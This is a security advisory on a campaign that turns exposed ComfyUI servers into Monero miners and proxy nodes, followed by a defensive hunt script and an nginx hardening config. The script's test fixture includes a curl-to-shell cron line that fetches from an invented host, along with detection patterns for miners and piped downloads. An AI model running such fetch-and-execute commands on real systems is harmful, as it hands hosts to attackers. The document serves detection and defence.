An active campaign is systematically compromising internet-exposed ComfyUI instances — the popular open-source Stable Diffusion workflow platform — turning them into Monero miners and proxy botnet nodes. Researchers at Censys disclosed the operation on April 7, 2026 after discovering an open directory on infrastructure tied to bulletproof hosting provider Aeza Group, revealing a Flask-based C2 dashboard managing over 1,000 compromised hosts.

How the Attack Works

The operator runs a purpose-built Python scanner that continuously sweeps major cloud IP ranges looking for publicly accessible ComfyUI instances. ComfyUI ships with no authentication and binds to 127.0.0.1 by default, but a common quick-start is to launch it with --listen, which binds 0.0.0.0; any such instance that is not behind a reverse proxy or firewall rule is reachable by the scanner and, as described below, exploitable.

Once a target is found, the scanner checks whether the instance is running custom nodes that expose unsafe functionality, specifically nodes that will execute attacker-supplied code as part of a workflow. If no such node is installed, the scanner abuses ComfyUI-Manager (the platform's package manager) to silently install a malicious node, then submits a crafted workflow that triggers remote code execution.

The payload is a shell script that:

  1. Disables shell history to reduce forensic artifacts
  2. Kills competing miner processes
  3. Downloads and launches XMRig (Monero) and lolMiner (Conflux)
  4. Installs Hysteria V2, a high-performance proxy protocol, likely to resell compromised nodes as residential proxies
  5. Registers a watchdog shared library in /etc/ld.so.preload so that it is loaded into every dynamically linked process (the LD_PRELOAD mechanism); the library hides the miner from process listings and restarts it if it is killed

Persistence

A newer variant of the scanner adds two persistence mechanisms. First, a cron job re-downloads the shell script every six hours, ensuring the operator can push updated payloads or mining configurations. Second, the exploit workflow is wired to re-execute every time ComfyUI starts, so rebooting the host does not break the infection chain.

Both the mining operation and the Hysteria V2 botnet are centrally managed through the Flask-based C2 panel, which lets the operator push instructions, swap wallet addresses, or deploy additional payloads across the entire fleet.

Who Is Affected

Anyone running ComfyUI on a cloud VM, dedicated server, or home lab with the web interface exposed to the internet without authentication is affected. The scanner targets AWS, GCP, Azure, and other major cloud IP ranges, but any publicly reachable instance is fair game. Censys identified over 1,000 exposed instances at the time of disclosure, and the true number is likely higher given the rapid growth of self-hosted AI image generation infrastructure.

Impact Assessment

The immediate impact is resource theft — compromised GPUs and CPUs are diverted to mine Monero and Conflux, degrading the performance of legitimate image generation workloads. The Hysteria V2 proxy component is arguably more dangerous: it gives the operator a distributed proxy network that can be used for credential stuffing, ad fraud, or laundering traffic through what appear to be legitimate cloud IPs.

Because ComfyUI custom nodes execute with the full privileges of the ComfyUI process (typically the user running it, often root on quick cloud deployments), the attacker also has arbitrary code execution on the host. This opens the door to lateral movement, data exfiltration, or deploying ransomware.

Mitigation

Immediate steps:

  • Audit exposure: Check whether your ComfyUI instance is reachable from the internet. If you can hit the web UI from outside your network without credentials, you are vulnerable.
  • Enable authentication: ComfyUI added optional authentication support; enable it. At minimum, put the instance behind a reverse proxy (nginx, Caddy, Traefik) with basic auth or SSO, and serve it over TLS so those credentials are not sent in the clear.
  • Check for rogue nodes: Review installed custom nodes via ComfyUI-Manager. Remove anything you did not explicitly install. Look for nodes with code execution capabilities.
  • Hunt for persistence: Check crontabs (crontab -l for each user, /etc/crontab, ls /etc/cron.d/, /var/spool/cron/), look for entries in /etc/ld.so.preload (on a clean host the file is absent or empty) and for the shared libraries it references, inspect running processes (ps -eo pid,user,args) for XMRig, lolMiner, or Hysteria binaries, and review any workflow that ComfyUI is configured to run at startup.
  • Firewall rules: Leave ComfyUI bound to 127.0.0.1 (its default; a bare --listen binds 0.0.0.0) and reach it over an SSH tunnel or VPN, or restrict its port (8188 by default) with a host firewall or cloud security group. There is no reason the ComfyUI web interface should be directly exposed to the internet.
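As an added example (not the Censys tooling, and not published indicators of compromise), a small POSIX shell hunt that checks the places the list above names: cron locations for a re-download job, /etc/ld.so.preload for an injected library, a saved process listing for miner or proxy binaries, and the ComfyUI command line for a --listen that is not 127.0.0.1. The indicator patterns are assumptions drawn from this write-up, and the fixture it builds by default is constructed so the script runs offline; pass a root directory and a saved ps listing to run it against a real host.

```shell
#!/bin/sh
# Added example, not from the Censys report or the ComfyUI project: a read-only
# hunt for the persistence artifacts described above. The regexes below are
# assumptions based on this write-up, not published IOCs.

# cron lines that re-fetch a script, or that name the tooling the campaign drops
CRON_RE='xmrig|lolminer|hysteria|ld\.so\.preload|(curl|wget)[^|]*\|[[:space:]]*(ba)?sh'
PROC_RE='xmrig|lolminer|hysteria'

# Usage: hunt_crontabs ROOT   (ROOT is / on a live host, or a fixture directory)
hunt_crontabs() {
    root="${1:-/}"
    for f in "$root"/etc/crontab "$root"/etc/cron.d/* \
             "$root"/var/spool/cron/* "$root"/var/spool/cron/crontabs/*; do
        [ -f "$f" ] || continue
        grep -HiE "$CRON_RE" "$f" || true
    done
}

# Any entry in /etc/ld.so.preload is loaded into every dynamically linked
# process; on a normal host the file is absent or empty, so print all of it.
hunt_preload() {
    f="${1:-/}/etc/ld.so.preload"
    [ -s "$f" ] || return 0
    sed "s|^|$f: |" "$f"
}

# Usage: hunt_processes PSFILE   (PSFILE holds `ps -eo pid,user,args` output)
hunt_processes() {
    grep -iE "$PROC_RE" "$1" || true
}

# A ComfyUI started with --listen and anything other than 127.0.0.1 is exposed
# (a bare --listen binds 0.0.0.0).
hunt_exposure() {
    grep -E 'main\.py.*--listen' "$1" \
        | grep -vE -e '--listen[[:space:]]+127\.0\.0\.1([[:space:]]|$)' || true
}

# Total number of finding lines across all four checks.
count_findings() {
    { hunt_crontabs "$1"; hunt_preload "$1"; hunt_processes "$2"; hunt_exposure "$2"; } \
        | grep -c . || true
}

report() {
    hunt_crontabs "$1"; hunt_preload "$1"; hunt_processes "$2"; hunt_exposure "$2"
    echo "findings: $(count_findings "$1" "$2")"
}

# Builds a constructed, infected-looking root plus a ps listing for offline use.
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/etc/cron.d" "$d/var/spool/cron/crontabs"
    # modelled on the six-hourly re-download described above (hostname is invented)
    printf '0 */6 * * * root curl -fsSL http://update.example.invalid/a.sh | sh\n' \
        > "$d/etc/cron.d/sysupdate"
    printf '0 5 * * * /usr/bin/logrotate /etc/logrotate.conf\n' \
        > "$d/var/spool/cron/crontabs/root"          # benign, must not match
    printf '/usr/local/lib/libwatchdog.so\n' > "$d/etc/ld.so.preload"
    printf '%s\n' 'PID USER ARGS' '1 root /sbin/init' \
        '2 root python main.py --listen 0.0.0.0 --port 8188' \
        '3 root /tmp/.cache/xmrig -o pool.example.invalid:3333' \
        '4 root sshd: /usr/sbin/sshd' > "$d/ps.txt"
    echo "$d"
}

# Live use:  ps -eo pid,user,args > /tmp/ps.txt; sh hunt.sh / /tmp/ps.txt
# With no arguments the constructed fixture is hunted instead.
if [ $# -eq 2 ]; then
    report "$1" "$2"
else
    d=$(make_fixture); report "$d" "$d/ps.txt"; rm -rf "$d"
fi
```

On the fixture the script reports four findings: the cron re-download line, the preload entry, the xmrig process, and the ComfyUI bound to 0.0.0.0; the benign logrotate job and sshd are not flagged. Treat a non-empty /etc/ld.so.preload as a finding in its own right even if the library name looks innocuous, since that is exactly where the page says the watchdog is hooked.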

Longer term:

The ComfyUI project should make authentication mandatory by default rather than opt-in. A GitHub discussion proposing exactly this has been open since late 2025. Until that ships, every unauthenticated deployment is one Shodan query away from becoming a mining node.
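As an added example that is not part of the original write-up or the ComfyUI project, a minimal nginx configuration for the interim mitigation: ComfyUI stays bound to loopback and nginx enforces basic auth (plus an optional source-IP allow list) in front of it, including on the websocket the UI uses. The hostname, certificate paths, htpasswd path and allowed range are placeholders; 127.0.0.1 and 8188 are ComfyUI's own defaults.

```nginx
# Added example, not from the ComfyUI project. ComfyUI itself is started bound
# to loopback only, e.g.:
#     python main.py --listen 127.0.0.1 --port 8188
# (a bare --listen binds 0.0.0.0, which is the exposure the campaign scans for).
# Credentials file:  htpasswd -B -c /etc/nginx/comfyui.htpasswd alice
# Hostname, certificate paths, htpasswd path and allowed range are placeholders.

map $http_upgrade $connection_upgrade {
    default upgrade;
    ''      close;
}

server {
    listen 443 ssl;
    server_name comfy.example.com;

    ssl_certificate     /etc/ssl/certs/comfy.example.com.pem;
    ssl_certificate_key /etc/ssl/private/comfy.example.com.key;

    # Every request, including the websocket used for queue updates, must
    # present credentials before anything reaches ComfyUI.
    auth_basic           "ComfyUI";
    auth_basic_user_file /etc/nginx/comfyui.htpasswd;

    # Optional second layer: only these source ranges may even attempt a login.
    allow 203.0.113.0/24;
    deny  all;

    location / {
        proxy_pass         http://127.0.0.1:8188;
        proxy_http_version 1.1;
        proxy_set_header   Upgrade         $http_upgrade;       # websocket at /ws
        proxy_set_header   Connection      $connection_upgrade;
        proxy_set_header   Host            $host;
        proxy_set_header   X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_read_timeout 3600s;        # long generations keep the socket open
        client_max_body_size 200m;       # image and model uploads
    }
}

# Redirect plain HTTP so the basic-auth credentials are never sent in the clear.
server {
    listen 80;
    server_name comfy.example.com;
    return 301 https://$host$request_uri;
}
```

With this in place, port 8188 is never reachable from outside the host, and the host firewall or cloud security group should still only admit 443 (and 80 for the redirect) from the networks that need it.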
